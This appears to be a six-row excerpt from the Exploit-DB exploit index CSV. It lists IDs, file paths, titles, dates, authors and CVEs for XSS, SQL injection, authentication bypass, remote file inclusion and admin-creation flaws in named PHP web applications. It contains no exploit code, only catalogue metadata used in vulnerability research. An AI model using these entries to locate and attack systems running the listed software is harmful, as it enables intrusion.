 34072,exploits/php/webapps/34072.txt,"Hexjector 1.0.7.2 - 'hexjector.php' Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-06-01,2014-07-15,1,,,,,,https://www.securityfocus.com/bid/40509/info
 12839,exploits/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,webapps,php,,2010-05-31,,0,,,,,http://www.exploit-db.comHexjector_v1.0.7.2.zip,
 51871,exploits/php/webapps/51871.txt,"Hide My WP < 6.2.9 - Unauthenticated SQLi",2024-03-10,"Xenofon Vassilakopoulos",webapps,php,,2024-03-10,2024-03-10,0,CVE-2022-4681,,,,,
 41044,exploits/php/webapps/41044.txt,"Hindu Matrimonial Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php,,2017-01-14,2017-01-14,0,,,,,,
 5981,exploits/php/webapps/5981.txt,"HIOX Banner Rotator 1.3 - 'hm' Remote File Inclusion",2008-06-30,"Ghost Hacker",webapps,php,,2008-06-29,2016-12-14,1,OSVDB-46636;CVE-2008-3127,,,,http://www.exploit-db.comHBR_1_3.zip,
 6168,exploits/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,webapps,php,,2008-07-29,2016-12-21,1,,,,,http://www.exploit-db.comHBS_2_0.zip,